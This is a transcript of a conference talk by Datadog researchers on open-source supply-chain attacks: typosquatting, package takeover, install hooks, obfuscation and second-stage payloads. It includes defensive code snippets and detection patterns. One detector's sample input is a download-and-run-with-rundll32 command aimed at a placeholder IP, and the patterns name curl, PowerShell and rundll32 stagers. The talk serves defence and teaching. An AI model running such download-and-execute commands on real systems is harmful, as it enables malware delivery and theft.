WEBVTT

00:00.000 --> 00:12.960
Okay, so, hi. So, supply chain attacks. We probably all remember SolarWinds, or heard about

00:12.960 --> 00:18.960
SolarWinds, back in 2020; it maybe put supply chain attacks on everybody's radar, certainly

00:18.960 --> 00:26.160
mine, as it sort of revealed the potential impact of an attack like this, which could have

00:26.160 --> 00:32.320
far-reaching consequences. Since then, there have been a number of other pretty sophisticated

00:32.320 --> 00:36.800
supply chain attacks, like XZ Utils recently, which was a very long-term package takeover

00:36.800 --> 00:43.360
attack, or something like 3CX, which was a chain of supply chain attacks used

00:43.360 --> 00:49.200
to compromise an application. And then, you know, seemingly every day we

00:49.200 --> 00:53.280
hear about more and more supply chain attacks of various complexities, so this thing

00:53.280 --> 00:58.960
is here to stay, and so one of the things we're going to be talking about today is some strategies

00:58.960 --> 01:04.240
that Sebastian, my colleague, and I see all the time in our continuous monitoring of open

01:04.240 --> 01:10.080
source package ecosystems, strategies that these threat actors like to use, and, you know,

01:10.080 --> 01:13.680
basically, like, what do they want? How are they trying to get it? And then also,

01:13.680 --> 01:17.760
make some recommendations for how people can protect themselves from this kind of attack.

01:18.320 --> 01:24.400
So, my name is Ian Cutts. I am a security researcher at Datadog, specializing in supply

01:24.400 --> 01:29.600
chain security. So, yeah, I'm Sebastian. I also work at Datadog; I've been there

01:24.400 --> 01:29.600
for about a year and a half, also working on supply chain security, and before that

01:29.600 --> 01:34.400
I worked in application security for a number of years. Okay. Yeah, so just to kind of set

01:42.720 --> 01:46.160
the stage, right? So, what is a supply chain attack? What is the software supply chain? So,

01:47.120 --> 01:50.720
at a very high level, right? We have a simple software supply chain here. Basically,

01:50.720 --> 01:54.080
we have some developer who wants to deliver some code to some consumer on the other end.

01:55.280 --> 01:58.960
And so, there's this kind of high level process of like maintaining the source code,

01:58.960 --> 02:03.200
developing the source code, writing it somewhere in version control. Then we go to build the source

02:03.200 --> 02:07.040
code in some build system, right? And when we do that, we're probably going to be pulling in

02:07.040 --> 02:12.240
some third-party dependencies to get involved in that process. And then finally, publishing the

02:12.240 --> 02:16.560
finished artifact somewhere or the source code, if it's like a library, right? In some way,

02:16.560 --> 02:23.920
where the consumer can access it. And so, basically, like, at each step of this pipeline,

02:23.920 --> 02:27.840
there's various kinds of attacks that can take place, so we can be compromising the integrity

02:27.840 --> 02:32.480
of the source code via like a malicious PR. For example, we can mess with the build system

02:32.480 --> 02:37.840
or mess with its inputs or outputs. We could go after the package repository itself,

02:37.840 --> 02:44.240
like maybe do like an account takeover of the publisher, right? And then we can also try to

02:44.240 --> 02:50.800
get our compromised or malicious dependencies into that build process. In terms of what these

02:50.800 --> 02:54.800
threat actors are after, it's pretty simple: there's kind of three things we see a lot.

02:55.680 --> 03:00.800
Credential theft, so developers have access to a lot of attractive targets for these attackers,

03:00.800 --> 03:05.920
like, I don't know, data or code, right? Very simply, so a lot of times we'll see them going

03:05.920 --> 03:11.520
after API keys or credentials like this. Resource misuse, so things like crypto miners,

03:12.080 --> 03:15.280
you install some package and it's got an embedded crypto miner. And so, there you go.

03:16.000 --> 03:20.480
Or, thirdly, something like SolarWinds: a downstream compromise, where some, you know,

03:20.480 --> 03:27.280
downstream client of the package is being targeted. And so, yeah,

03:28.720 --> 03:33.120
maybe the choice to use open source is more complicated than it might seem at first,

03:33.120 --> 03:37.440
security-wise, so we'd like to feel confident in, you know, our decision to do so, and so that's

03:37.440 --> 03:45.920
kind of what we'll be talking about here. Okay, so, to detect malicious packages, we'll go

03:45.920 --> 03:52.880
with GuardDog. We're going to explain a little bit how we are using this CLI tool,

03:52.880 --> 04:00.400
which is a tool that we created at Datadog internally for scanning the PyPI and npm ecosystems.

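By way of illustration, invoking the GuardDog CLI looks roughly like this; the exact subcommands and flags are assumptions based on the tool's public README, so check the documentation for your version (and the package names here are placeholders):

```shell
# Scan a single PyPI package (hypothetical target name)
guarddog pypi scan some-package

# Scan an npm package and emit machine-readable results
guarddog npm scan some-package --output-format json
```
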
04:04.000 --> 04:15.280
So, basically, we use GuardDog, which pulls data from the packages published in

04:15.280 --> 04:24.160
PyPI or npm, and this tool makes use of two kinds of analysis. One is called metadata analysis,

04:24.880 --> 04:31.200
which is basically the detection of some patterns present in the characteristics of the

04:31.280 --> 04:37.440
package itself. Imagine something like the registration email address of a

04:37.440 --> 04:43.200
maintainer, right? In this case, it can be a disposable email address, and that's the

04:43.200 --> 04:53.920
kind of thing this detection catches. On the other hand, it uses another type of detection, called source

04:54.080 --> 05:01.280
code analysis, for which, under the hood, we are using two tools. One is called YARA,

05:01.280 --> 05:09.360
which is very good for indicators of compromise, such as domains or

05:09.360 --> 05:16.000
IP addresses. For instance, in this case, we can encode these kinds of indicators in a YARA rule.

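The IOC-style matching described here can be sketched in plain Python; the indicator values below are made up for illustration and are not GuardDog's actual rules:

```python
import re

# Hypothetical indicators of compromise (IOCs): the values below are made
# up for illustration, not real campaign infrastructure.
IOC_PATTERNS = [
    re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),  # any hardcoded IPv4 address
    re.compile(r"evil-updates\.example\.com"),   # a known-bad domain
]

def scan_source(source: str) -> list[str]:
    """Return the IOC matches found in a piece of package source code."""
    hits: list[str] = []
    for pattern in IOC_PATTERNS:
        hits.extend(pattern.findall(source))
    return hits

print(scan_source('fetch("http://203.0.113.7/payload.bin")'))  # ['203.0.113.7']
```

A real YARA rule expresses the same idea declaratively, with strings and a condition, and scales to thousands of indicators.
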
05:17.280 --> 05:23.280
Also, we are using Semgrep, right? This is another kind of tool that does a kind of

05:23.360 --> 05:29.280
semantic analysis, and it's pretty good at detecting behavioral patterns

05:29.280 --> 05:35.760
in the code, right? For instance, it shines really well

05:36.480 --> 05:44.160
at detecting, for example, the execution of Base64 payloads. So, in this sample execution

05:44.160 --> 05:50.640
of GuardDog, the tool, you can see those are the rules that

05:50.640 --> 05:57.360
fired on a real package on npm. A couple of things to notice about GuardDog:

05:57.360 --> 06:05.360
is that, you know, it allows you to use JSON-formatted output to do more

06:06.480 --> 06:12.960
automated analysis on the outcome. And also, one thing to notice is that GuardDog doesn't

06:12.960 --> 06:18.480
give you any final decision on whether the package is malicious or not;

06:18.560 --> 06:25.680
it just raises risk flags on the package, okay? The actual decision has to be taken

06:25.680 --> 06:32.240
by an actual researcher at the moment. So, this is how we use GuardDog

06:32.240 --> 06:41.040
internally at Datadog. Basically, we implemented a set of auto-crawlers that are basically

06:41.040 --> 06:47.120
crawling the repositories, PyPI and npm. Roughly, you can imagine that we have

06:47.120 --> 06:59.600
something like 300K npm packages and 75K

06:59.600 --> 07:07.200
PyPI packages a month. We scan these once with GuardDog. And the findings

07:07.200 --> 07:14.640
that we were talking about are then filtered with a set of behavioral patterns

07:14.720 --> 07:22.320
and a combination of machine-learning techniques, okay? To give you an idea, we

07:22.320 --> 07:30.080
end up considering something like 0.6% of packages suspicious or interesting enough for

07:30.080 --> 07:36.640
further analysis. Then the triage stage is conducted by a human,

07:36.640 --> 07:42.560
right? And if confirmed, then the malicious package sample is uploaded to a public

07:42.560 --> 07:49.840
repository, our malicious-software-packages dataset. Okay. So, yeah, now we'll just kind of go through:

07:49.840 --> 07:54.480
we have four common strategies we see these threat actors using, and we'll

07:54.480 --> 07:58.080
use some of the packages we've been finding with GuardDog to support the case

07:58.080 --> 08:03.440
we're making. So, the first is to target popular packages to get at their developers;

08:03.440 --> 08:06.720
we were saying earlier developers are attractive targets for these attackers. So, how do you

08:06.720 --> 08:12.240
get developers? You go after the packages they want to use. Um, so basically there's kind of two ways,

08:12.240 --> 08:17.120
you can go about this. Um, if you're the attacker, you can publish a new already malicious package

08:17.120 --> 08:22.880
or you can seek to take over an existing package. Um, the first case is very easy. You can just upload

08:22.880 --> 08:28.080
whatever you want to, say, npm, but it's not a very efficient strategy, because like 10K packages

08:28.080 --> 08:32.240
get uploaded to npm every day, so nobody knows your package, right? So you have to tackle:

08:32.240 --> 08:37.680
how do I get people to take notice of my package? And the way they often do this is

08:37.840 --> 08:41.920
not very sophisticated, right? You just try to affiliate the malicious package with some

08:41.920 --> 08:47.920
targeted package, usually by a naming trick. So we see a lot of combosquatting, where,

08:47.920 --> 08:52.240
if I'm targeting requests, I could do something like py-requests; or typosquatting,

08:52.240 --> 08:56.400
where the name of the malicious package is a typo of the targeted package. You can see it there.

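A minimal guardrail against both tricks is an edit-distance check of what you're about to install against the packages you actually meant; `POPULAR` here is a stand-in list for illustration:

```python
from difflib import SequenceMatcher

# Stand-in list of the popular packages you actually depend on.
POPULAR = ["requests", "express", "lodash", "numpy"]

def squatting_suspects(name: str, threshold: float = 0.8) -> list[str]:
    """Return popular packages that `name` is suspiciously similar to,
    but not identical with -- a cheap typosquat/combosquat heuristic."""
    return [
        pkg for pkg in POPULAR
        if pkg != name and SequenceMatcher(None, name, pkg).ratio() >= threshold
    ]

print(squatting_suspects("requets"))   # ['requests'] -- likely a typo
print(squatting_suspects("requests"))  # [] -- exact match, nothing to flag
```
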
08:56.400 --> 09:01.440
Not very sophisticated stuff. Um, on the other hand, package takeover is a lot more lucrative

09:01.440 --> 09:06.160
because these packages already have developers that use them, but it's harder for the attacker.

09:06.160 --> 09:10.080
They have to perform some kind of compromise to get it to work. And so this could be like

09:10.080 --> 09:16.160
compromising the maintainer credentials, malicious PR, other things like that. So if you go back to

09:16.160 --> 09:22.160
our architecture, kind of overview, this could take place anywhere right at any stage of the pipeline,

09:22.160 --> 09:27.520
depending on what the attacker is trying to do. Um, so here we have an example that we found in the

09:27.520 --> 09:34.480
past year of a name-squatting attack, a combosquatting attack. So on the left we have a legitimate

09:34.560 --> 09:38.560
npm package, and on the right we have a malicious one from a threat actor we've called

09:38.560 --> 09:43.840
Tenacious Pungsan at Datadog. It's a DPRK-affiliated threat actor, and we use the national

09:43.840 --> 09:48.160
dog breed of the nation to name the threat actor; the Pungsan is a dog breed from North

09:48.160 --> 09:54.480
Korea. So you can see, very simply: passport versus passports-js. Otherwise, if you look at the

09:54.480 --> 09:58.240
READMEs, they're exactly the same, although the graphic didn't load on the left. But, you know,

09:58.240 --> 10:02.720
you just copy the code, backdoor it and upload it with a similar name, right? Not very sophisticated.

10:03.360 --> 10:08.080
On the package-takeover side, the stuff tends to be more interesting, right? Right at the end of

10:08.080 --> 10:13.600
2024, there was a notable package-takeover instance for this Python package called Ultralytics,

10:13.600 --> 10:18.400
where they were running a vulnerable GitHub Action on their repo. You can see, in the pink box,

10:18.400 --> 10:23.840
the branch name is used unescaped in a shell command. And so this allowed an attacker

10:23.840 --> 10:28.480
to submit a malicious PR with a crafted branch name, which ended up running a shell script in

10:28.480 --> 10:32.240
the context of the GitHub Action. And so they were able to exfiltrate the pipeline's publishing

10:32.240 --> 10:38.000
token and upload some malicious versions to PyPI. There's a great analysis of this attack at that

10:38.000 --> 10:45.600
blog post. Um, and so like package takeover is complicated, but the name squatting stuff is very

10:45.600 --> 10:50.160
simple to avoid by just like doing the simple obvious checks. So our advice would be just to use

10:50.160 --> 10:56.400
simple guardrails to minimize the consequences of simple mistakes like a typo. Um, in our research

10:56.400 --> 11:01.280
in Q4, we found that at least 70% of the malicious packages we triaged were using some kind of

11:01.280 --> 11:06.560
name squatting or targeting some other package. So if you're an end user, if you're like a user of

11:06.560 --> 11:10.560
an open source package, just make sure you're spelling everything correctly, the simple obvious solution.

11:11.840 --> 11:15.920
To guard against package takeover, you could use version pinning; don't just use the latest version

11:15.920 --> 11:20.400
of the package, in case something happens. And then, if you're lucky enough to work at a company

11:20.480 --> 11:26.240
or institution that can do this for you, use an internal

11:26.240 --> 11:30.080
mirror of the package repository, with verified artifacts, to

11:31.120 --> 11:37.280
only pull things from; you'll cut off a lot of these kinds of problems that way. Meanwhile,

11:37.280 --> 11:41.600
like for the package repositories themselves, I think we would suggest like introducing some kind of

11:41.600 --> 11:46.320
moderated publishing: simply not allowing people to publish on typosquats of, certainly,

11:46.320 --> 11:50.880
prominent packages, but ideally all packages; whether it's some kind of verification of, like,

11:50.880 --> 11:58.000
"this code looks too similar to an existing package," then no. And then also, post-compromise,

11:59.120 --> 12:03.360
take those package names out of circulation and replace them with security placeholders,

12:03.360 --> 12:07.600
so that people who didn't update their dependencies don't get re-infected.

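To make the version-pinning advice concrete for pip: pin exact versions, ideally with artifact hashes, so a hijacked release or substituted artifact fails the install. The package line and digest below are placeholders; `pip-compile --generate-hashes` (from pip-tools) is one way to produce real ones:

```shell
# requirements.txt -- pin an exact version plus the artifact's digest.
# (Both the version and the sha256 value here are placeholders.)
#
#   somepackage==1.2.3 --hash=sha256:0123abcd...
#
# Install so that anything unpinned, or with a mismatched hash, is rejected:
pip install --require-hashes -r requirements.txt
```
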
12:11.200 --> 12:15.600
Okay, now we're going to talk about the next strategy used by threat actors,

12:17.040 --> 12:23.600
which is to exploit developers via install-time hooks. So install-time hooks are a mechanism

12:23.600 --> 12:30.720
that can be used in packages on, like, PyPI or npm to trigger code at install time, right?

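On npm, these hooks live in the `scripts` section of `package.json`; a minimal audit for them, as a sketch, could look like this:

```python
import json

# Lifecycle script names that npm runs automatically during `npm install`.
INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

def install_hooks(package_json: str) -> dict[str, str]:
    """Return any scripts in a package.json that run at install time."""
    scripts = json.loads(package_json).get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in INSTALL_HOOKS}

manifest = '{"name": "innocuous-lib", "scripts": {"postinstall": "node setup.js", "test": "jest"}}'
print(install_hooks(manifest))  # {'postinstall': 'node setup.js'}
```
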
12:31.840 --> 12:39.360
This is a very common way to exploit something. So, how does this actually

12:39.440 --> 12:45.040
work in the wild? I wanted to go over an example. So let's say

12:46.960 --> 12:53.920
I'm an attacker, and I publish two artifacts: one to npm, with a malicious payload,

12:53.920 --> 13:00.720
triggered, I don't know, with install-time execution. And another, like a sample repo,

13:00.720 --> 13:07.760
to GitHub, for doing whatever. This GitHub repo has no malicious

13:07.920 --> 13:14.640
behavior whatsoever. The only thing it has is a dependency on the npm package

13:15.440 --> 13:25.120
that was published before. Then a GitHub user is lured into downloading the package,

13:25.120 --> 13:32.480
right? There are a number of ways threat actors can achieve this. One of the favorite techniques,

13:32.480 --> 13:40.160
implemented by DPRK threat actors, is to use it as a job interview, right? "Hey, I need you to do this

13:40.160 --> 13:45.280
job for me. You have to do this test, test it out. You have to download this code and execute it." Then,

13:47.280 --> 13:54.240
bam, this code is pulled from npm and triggered. So if you look

13:54.240 --> 13:59.440
again at the architecture diagram that was shown before, this attack goes in the "use

13:59.440 --> 14:06.800
compromised dependency" and "use compromised package" parts. And here we can see an example of how

14:08.240 --> 14:15.440
this self-deleting initial access vector was used by the threat actor, in a test

14:15.440 --> 14:23.280
function. Again, at Datadog, we name the known threat actors; in this case,

14:24.000 --> 14:30.720
the name goes after the dog breed of the country the threat actor is representing.

14:32.720 --> 14:40.240
And so we can see here that it's executing the referenced JS file, which in this case downloads,

14:40.240 --> 14:52.800
using curl, a DLL, and then uses the rundll32 binary, a trusted binary, for execution

14:53.440 --> 15:01.520
of the DLL code that it just downloaded. This is a technique very much used by this threat actor.

15:02.960 --> 15:09.120
Another example, this time from PyPI, from the Lappardexos package:

15:09.840 --> 15:17.760
in this case, it was from MUT-8694; MUT stands for "miscellaneous unattributed threat."

15:18.000 --> 15:25.280
Basically, this is the way we name threat actors that don't belong to a known or

15:25.280 --> 15:31.040
nation-state threat actor, but whose attacks we can cluster into one specific cluster.

15:31.680 --> 15:41.600
So, as you can see, already in the installation process, in the setup file,

15:41.920 --> 15:48.800
the actor is also using PowerShell to download a binary and execute it. This time, it was a stealer.

15:50.640 --> 15:57.920
So what can we do about this? Be wary of install-time hooks, right? This sounds obvious, but

15:58.960 --> 16:06.480
many threat actors often disguise or cover this under downstream dependencies,

16:06.480 --> 16:15.840
so the attack is not so obvious, right? So, some recommendations or mitigations.

16:16.400 --> 16:23.600
First of all, 85% of the malicious packages we observed during Q4 were using this kind of attack,

16:23.600 --> 16:29.360
so this is important, right? For package maintainers, we can say: limit the usage of install

16:29.360 --> 16:35.680
scripts as much as possible. We see, time and time again, that developers are

16:36.240 --> 16:41.440
using the install-time hooks for greetings: "Hey, thank you for installing this package."

16:41.440 --> 16:48.640
I mean, okay, but there are other ways to achieve that, right? For end users, if possible,

16:48.640 --> 16:54.720
completely disable install scripts. For PyPI, you can use wheels, which don't run

16:54.800 --> 17:03.120
setup.py installation scripts; but for npm, disabling scripts will probably break stuff. You can

17:03.120 --> 17:09.040
audit them, for that matter; GuardDog, the tool we showed earlier, can help. So, for

17:09.040 --> 17:16.320
package repositories: one, you could flag packages using this. Probably not very helpful,

17:16.320 --> 17:23.520
but surely it can help in some cases. And also, perform regular audits of which packages are using this.

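The end-user mitigations just described correspond to real installer flags (worth double-checking against your npm and pip versions):

```shell
# npm: skip preinstall/install/postinstall lifecycle scripts entirely
npm install --ignore-scripts

# pip: refuse source distributions (whose setup.py can run arbitrary code
# at install time) and accept only prebuilt wheels
pip install --only-binary :all: somepackage   # package name is a placeholder
```
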
17:25.600 --> 17:30.320
Okay, great. So the third thing we see a lot is the use of obfuscation to hide

17:30.320 --> 17:34.640
what they're doing. So if you're a threat actor and you want to deliver malware via npm,

17:34.640 --> 17:38.640
a problem you'll run into right away is that everybody can see the malware. So you need to hide it in

17:38.640 --> 17:44.240
some way. So one thing we see a lot is the use of this obfuscator called

17:44.240 --> 17:50.400
obfuscator.io, which produces this garbled-looking text at the bottom. What it does is

17:50.720 --> 17:55.120
it takes the input code and, for one thing, replaces the variable names with random ones.

17:55.120 --> 18:00.080
It removes the formatting, but then it also packs the code in a certain way, where it's

18:00.080 --> 18:04.320
getting unpacked at runtime and actually being executed. So it makes it difficult to read

18:04.320 --> 18:09.680
and difficult for static analysis to help you with. Fortunately, it's relatively easy to

18:09.680 --> 18:14.080
partially unobfuscate, or deobfuscate. And so indeed, that sample we were just looking at,

18:14.080 --> 18:19.680
when you deobfuscate it, deobfuscates to this, in part. So these are two screenshots from an

18:19.680 --> 18:24.720
infostealer called BeaverTail, which is DPRK-associated. So you can see on the left

18:24.720 --> 18:29.440
that we have a second stage being downloaded, and then on the right we have some data exfiltration.

18:31.680 --> 18:36.400
So again, you'll see you'll need to be on the lookout if you're like the user of a package

18:36.400 --> 18:41.120
or if you're using a package to build something. There's just another example of this.

18:42.400 --> 18:48.240
On the Python side, it tends to be a little different. So we see a lot of decode-and-execute

18:48.240 --> 18:54.320
patterns: Base64, or decompression, or decryption, or character-encoding stuff.

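The decode-then-execute pattern mentioned is easy to grep for; here is a toy detector with an illustrative pattern only (real tooling, like GuardDog's Semgrep-based rules, is far more robust than a single regex):

```python
import re

# The classic Python decode-then-execute idiom: exec()/eval() wrapped
# around a Base64 decode. One regex, for illustration only.
DECODE_EXEC = re.compile(
    r"(?:exec|eval)\s*\(\s*(?:__import__\(['\"]base64['\"]\)|base64)\.b64decode"
)

def looks_like_decode_exec(source: str) -> bool:
    """Flag the `exec(base64.b64decode(...))` obfuscation idiom."""
    return bool(DECODE_EXEC.search(source))

print(looks_like_decode_exec("exec(base64.b64decode('cHJpbnQoMSk='))"))  # True
print(looks_like_decode_exec("print('hello')"))                          # False
```
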
18:54.320 --> 18:58.560
And it just goes to the point that ecosystems have their own kinds of obfuscation

18:59.280 --> 19:06.960
tactics or techniques that people use. So the obvious recommendation is: just say no to obfuscation.

19:06.960 --> 19:11.840
There's no good reason to distribute open source code that's intentionally difficult to read.

19:12.000 --> 19:14.560
So don't write it, don't use it, don't allow it.

19:19.360 --> 19:24.080
And the last strategy we're going to see is minimizing exposure by using a second-stage payload.

19:25.280 --> 19:30.880
So this is an example of how the second-stage payload is used.

19:30.880 --> 19:37.680
In case you are not aware, malicious actors are using this thing that is called a second-stage

19:37.760 --> 19:45.760
payload, which means delivering one small portion, like just a downloader of the real stuff.

19:46.320 --> 19:51.120
So the package itself only has to carry a little. For instance, in this case, we're seeing this example,

19:51.120 --> 19:56.080
which lures the victim into installing the package, as we discussed. It runs the script automatically,

19:56.640 --> 20:04.240
and then downloads the DLL, and then runs it, right? The point here is that the DLL has the actual payload;

20:04.320 --> 20:09.120
the only thing that was in the package was the link to download it, right?

20:10.880 --> 20:16.560
Again, in the architecture diagram, this goes into the "use compromised dependency" or "use compromised

20:16.560 --> 20:24.480
package" parts. Here is an example of using PowerShell to download and run a stealer. Again,

20:25.760 --> 20:29.920
the malicious payload is hosted on GitHub, not on npm or PyPI.

20:30.880 --> 20:35.440
In another example, using again obfuscation, the method that I was talking about,

20:36.240 --> 20:45.120
the actor is concealing a bash script that installs a service to run a miner.

20:46.480 --> 20:51.600
So what are you going to do about this? Make sure your code is behaving, okay?

20:52.160 --> 20:54.800
Much easier said than done, right?

20:57.040 --> 21:02.000
So for package maintainers, we can say: avoid using external runtime downloads.

21:02.560 --> 21:11.200
It's harder, it's not always possible to do this, but many times we see that

21:11.200 --> 21:16.000
it's used, it's overused, right? So for end users:

21:16.960 --> 21:22.080
examine whether a package downloads things, whether it has some of those patterns;

21:22.080 --> 21:27.520
again, this is harder to achieve, but GuardDog can help out here. Otherwise, you can use a

21:27.520 --> 21:33.280
container to somehow mitigate the exposure of the host. Yes, you can try.

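Examining a package for runtime-download behavior before installing can start as simply as grepping its files for downloader invocations. The patterns below are illustrative and far from exhaustive; a container or sandbox remains the safer option:

```python
import re

# Command fragments that commonly indicate a runtime second-stage download.
DOWNLOADER_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"\bcurl\s+-[A-Za-z]*[sO]",        # curl fetching quietly / to a file
        r"\bpowershell\b.*downloadstring", # classic PowerShell stager
        r"\brundll32\b",                   # proxy execution of a fetched DLL
    )
]

def download_indicators(text: str) -> list[str]:
    """Return which downloader patterns appear in a file's contents."""
    return [p.pattern for p in DOWNLOADER_PATTERNS if p.search(text)]

script = "curl -sL http://203.0.113.7/x.dll -o x.dll && rundll32 x.dll,Run"
print(len(download_indicators(script)))  # 2
```
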
21:34.480 --> 21:39.280
So, the thing called Supply-Chain Firewall: at the tail end of last year, we released this

21:39.280 --> 21:45.520
open source package, which basically is just a drop-in CLI tool to filter your npm install

21:45.520 --> 21:50.160
or pip install commands, excuse me. So it'll inspect the install targets, it'll check

21:50.160 --> 21:55.120
them against lists of known-bad packages; or if there are vulnerabilities, it'll let you know about

21:55.120 --> 21:59.760
that too. And then, yeah, if you set up your environment the right

21:59.760 --> 22:05.200
way, it'll passively scan all of your commands, like every pip install command, if you like.

22:06.880 --> 22:14.080
And yeah, okay, just one final thought. For package maintainers: don't be shady. That means

22:15.760 --> 22:23.360
leave the weird stuff to the bad guys; try to write the most obviously benign code behavior,

22:23.360 --> 22:28.480
right? For end users: don't be an easy target. If you're installing something and you're not

22:28.480 --> 22:36.800
aware of what it is, do your research, check it, test it, probably isolate it, right? And for package

22:36.800 --> 22:43.520
repositories, lastly: increase the barrier to entry for threat actors. It's really, really easy for

22:43.600 --> 22:49.600
threat actors to publish bogus or malicious packages, so there are a lot of good improvement

22:49.600 --> 22:56.880
opportunities there to prevent the techniques we saw today. And yep, that's it.

23:05.520 --> 23:07.200
We have two minutes for questions.

23:07.200 --> 23:10.320
Yep, sure. So go ahead, sorry.

23:37.200 --> 23:48.800
Yeah, that's a great question. So the short answer is, that's kind of it. It's very early

23:48.800 --> 23:54.960
days for this tool; we hope to... oh, I'm sorry, the question was: if packages are being taken

23:54.960 --> 23:58.560
down quickly from these open source ecosystems, what is Supply-Chain Firewall actually doing for

23:58.560 --> 24:05.680
you? So, you're right. Right now, it's kind of only good, on the malicious side, for things

24:05.680 --> 24:08.560
that are known to be malicious, right? So if it's been taken down the threat has been kind of

24:08.560 --> 24:13.280
neutralized in some sense; these things do kind of float around in different mirrors and things,

24:13.280 --> 24:18.480
maybe. It also consults OSV.dev, so there's a secondary function of pointing out

24:18.480 --> 24:22.400
vulnerabilities. We hope to integrate like scanning capabilities into the tool later on,

24:22.400 --> 24:25.600
maybe facilitated by guard dog. Yeah, that's where we are today.

24:35.680 --> 24:50.000
[Audience question, largely inaudible: about the developer side.]

24:50.000 --> 24:55.680
Yeah, so, if I understand it correctly, the question is:

24:55.680 --> 25:05.440
we are focusing a lot on the package repository side,

25:05.520 --> 25:10.880
but is there something we can do on the developer side?

25:13.200 --> 25:23.840
So, basically, we gave a couple of good tips for every single part, right?

25:23.840 --> 25:30.960
For instance, for the developers, we said something about trying not to ship

25:31.120 --> 25:37.120
obfuscated code, right? But this is something that has to be implemented,

25:37.120 --> 25:42.160
this control has to be implemented in all the parts. Like, we can say to the developer, "hey,

25:42.160 --> 25:45.280
don't obfuscate your code," and we can detect it, but if the

25:45.280 --> 25:50.320
package maintainers or the repositories are not preventing obfuscated code from being uploaded

25:51.040 --> 25:54.560
to open source repositories, then that's pretty much all we can do, right?

25:55.600 --> 25:57.600
I think we're out of time. So thank you.

26:00.960 --> 26:04.240
Thank you.

